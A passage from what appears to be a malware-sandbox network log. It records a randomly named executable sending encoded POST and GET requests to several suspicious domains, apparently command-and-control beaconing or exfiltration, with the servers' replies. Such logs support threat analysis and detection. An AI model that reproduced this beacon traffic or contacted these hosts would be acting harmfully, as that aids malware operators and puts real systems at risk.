                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Oct 31, 2024 01:38:42.752974987 CET | 212 | IN
                                                                                                                                                                              Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.des
Oct 31, 2024 01:38:42.752990007 CET | 1236 | IN
                                                                                                                                                                              Data Ascii: cription-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyf
Oct 31, 2024 01:38:42.752999067 CET | 486 | IN
                                                                                                                                                                              Data Ascii: -46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s"><p>Oop


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 50019 | 13.248.169.48 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:47.996860981 CET | 719 | OUT | POST /akxn/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.xipowerplay.xyz
                                                                                                                                                                              Referer: http://www.xipowerplay.xyz/akxn/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=WXqJY1M5YeliHFTqrdZyZqNi70uSrSdUbo/m8fWnkynMVsxZqGyuVWbZuMT7Uv5sbgLi6KQgXWgRjnEikJEI8gknjLHQGVUWQ9BqqZYO/LCHt28BPFcXp1eskqXxQkWoechM/dtbY9Ec4BOgjalWE2ATCXGzmdif2esxFFGEOEOB/izDeDvT14eUQyAHW/aDBQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 50021 | 13.248.169.48 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:50.539037943 CET | 739 | OUT | POST /akxn/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.xipowerplay.xyz
                                                                                                                                                                              Referer: http://www.xipowerplay.xyz/akxn/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=WXqJY1M5YeliGlDqnaFyfKNh+0uSlydQbo7m8bu34QDMVMhZrCmuZ2bZgsT+aP5dbgPq6PogXW0Rjlsi4oF68wkyorHSJ1UWQ9BqqZMk/L6Hti4BdWEU1FejlqXxa0Wsechi/cw0Y4Yc4A+ggLlVN2BYfnHPvdWUvtVXOTSfOmGa+k+ZPyOEn46nN1Jzb8nKaVGztsWaLHA6WsdhDETpGbI=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 50022 | 13.248.169.48 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:53.087395906 CET | 10821 | OUT | POST /akxn/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.xipowerplay.xyz
                                                                                                                                                                              Referer: http://www.xipowerplay.xyz/akxn/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 50023 | 13.248.169.48 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:55.625713110 CET | 454 | OUT | GET /akxn/?hrOd=1DzdIBZXhZaHw2Wp&78=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:38:56.282108068 CET | 400 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Server: openresty
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:38:56 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 260
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?hrOd=1DzdIBZXhZaHw2Wp&78=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 50024 | 198.251.84.200 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:39:01.389820099 CET | 728 | OUT | POST /wd23/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.stationseek.online
                                                                                                                                                                              Referer: http://www.stationseek.online/wd23/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=sTBd9fWtqaQD00LEzLjg00FQtpPjyRLkyBaQzA50m19ZQpB2yWdQsH1bMqmH1l9y2a7Nu/upxqk3uInhAW5lKoTisB/qdqAEemSg5tGLA/GJJ0pEC2YwTwk29DmhOFmlHg7PkCzbiEb5ucavO5ZDp9DCm3Nn7q1KJZ/OXZDHQJX39cN4I7xGCICRilBkEelzfw==
Oct 31, 2024 01:39:02.291898012 CET | 908 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:39:02 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              18 | 192.168.2.4 | 50025 | 198.251.84.200 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 31, 2024 01:39:04.017527103 CET | 748 | OUT | POST /wd23/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.stationseek.online
                                                                                                                                                                              Referer: http://www.stationseek.online/wd23/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=sTBd9fWtqaQD1XDE1s3gyUFTiJPj8BLoyBGQzFczlAtZQLJ2jndQvH1bEKmC7F912bHzu/Cpxqg3uJXhAn4XJYTgnh+MZqAEemSg5tDWA+uJJEZECXY3Qwk18DmhKFmhHg6akAHxiHv5uYKvOtNCj9DEi3ML8ZIBOp21WrPGe6nHx6AiZKQRQImi/iIQJdY6Exe/C+T/0PFB1TQ2LdN+BHw=
                                                                                                                                                                              Oct 31, 2024 01:39:04.924788952 CET | 908 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:39:04 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              19 | 192.168.2.4 | 50026 | 198.251.84.200 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 31, 2024 01:39:06.630914927 CET | 10830 | OUT | POST /wd23/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.stationseek.online
                                                                                                                                                                              Referer: http://www.stationseek.online/wd23/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:39:07.529956102 CET | 908 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:39:07 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              20 | 192.168.2.4 | 50027 | 198.251.84.200 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 31, 2024 01:39:09.170979023 CET | 457 | OUT | GET /wd23/?78=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:39:10.080965996 CET | 1054 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:39:09 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23?78=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&hrOd=1DzdIBZXhZaHw2Wp
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              21 | 192.168.2.4 | 50028 | 172.67.154.67 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 31, 2024 01:39:15.292696953 CET | 704 | OUT | POST /jwed/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.091210.xyz
                                                                                                                                                                              Referer: http://www.091210.xyz/jwed/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=MNWxkH/vtjzbbqyx30Zjr+qNZp0Axef59Vh/H5I8ynIIyPZL87yemFFSDlUYnlNwoRPiW+rusqhD+RhgU8vdXb/k5NlHAQvRDRGHcCGIgdQfu4EflTtRb0OGnHIhuvpn3Ov0cB+I29yWM7cibYDSaIBH7mhbNWpGgMlRDHC9CP/QDS2CdJH2iTIQH0zH/qHbLA==
                                                                                                                                                                              Oct 31, 2024 01:39:15.979545116 CET | 1032 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:15 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FqvMzc9b4Xm8EXRXwIzEUx8qTuQreof9LnpSj757TG6WG80x4Ho%2BYvbZ3OXo6m%2FtEQVc995R9BOgcYzdANGLOEp83aiuuX2fghWWCXrEggENxLM0%2BYkSujP8%2BDxBpKWVkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8daf9643dcff68f9-DFW
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=704&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 50029 | 172.67.154.67 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:39:17.833415031 CET | 724 | OUT | POST /jwed/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.091210.xyz
                                                                                                                                                                              Referer: http://www.091210.xyz/jwed/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=MNWxkH/vtjzbaLCx2Xxjj+qOcp0A7+e+9V9/H7kSyVsIytBL6KyelFFSIFUXpFNBoRSfW+XusqlD+UdgUPXeXL/qidlZNwvRDRGHcDjVgdIfuI0fk35eVUOHunIhqvp73OvGcAjt2+KWM6MibK7RTIBFkWgMN3xNlOUnORuqNuq9P07YM4mhwTsjaz6zyp6SQGkAPsaCKkrVBhO2u59gbh8=
Oct 31, 2024 01:39:18.537484884 CET | 1043 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:18 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYjP6e0t%2BMYPZTn0qR%2FdKNOPYh%2FGD%2FxnmuQtwXu1eM3XG18S8P9aDiP7oySl%2F0GnVYlRgn10JoshBpGChVIfvvhW4eAm6boYhHx5rM2PrSTfuIaN%2B4E4r4pWB1oQlQ1%2F6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8daf9653c814e73a-DFW
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 50030 | 172.67.154.67 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:39:20.378134012 CET | 10806 | OUT | POST /jwed/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.091210.xyz
                                                                                                                                                                              Referer: http://www.091210.xyz/jwed/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:39:21.055593967 CET | 1030 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:20 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzRp0ITpMiKMmyqvDYE1xNjy3Lah1je4q%2FIS0Upv7LW9qevGZg4yWiG%2FofLNMKnn0SZXK1%2FPhoNLe2rA5qckraWgi%2FGznFJ0LVXn2zWKijQRPFVynSKAqSTox39thQdHPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8daf9663ad812e72-DFW
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2173&sent=3&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10806&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 50031 | 172.67.154.67 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:39:22.943212032 CET | 449 | OUT | GET /jwed/?hrOd=1DzdIBZXhZaHw2Wp&78=BP+RnxL4kRmCbJis2H94uci3abF0xOX/uWRdW7IS0nQn3eBqrLGhokpRAgB0njlljCrnZN3jlOJi4UAaeIXlep/T+OgRPR3ifAipJWCHkORcjZ0KtUFfU2c= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:39:23.643114090 CET | 1035 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:23 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ex3NA40qn75CUdLhGIHIJeT%2Fh5Q3gt3uDkQuj0zOs5DrOvfGrCm4hdvuJ4%2BMltLEVJl2gxny37spWt2QFejTdvRzb6yKU6HazCWEoDjrrf84tlKSZRUKcHOttHICwQPlQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8daf9673ba1ca916-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1927&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=449&delivery_rate=0&cwnd=139&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Ascii: 104<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.091210.xyz Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 50032 | 20.2.249.7 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
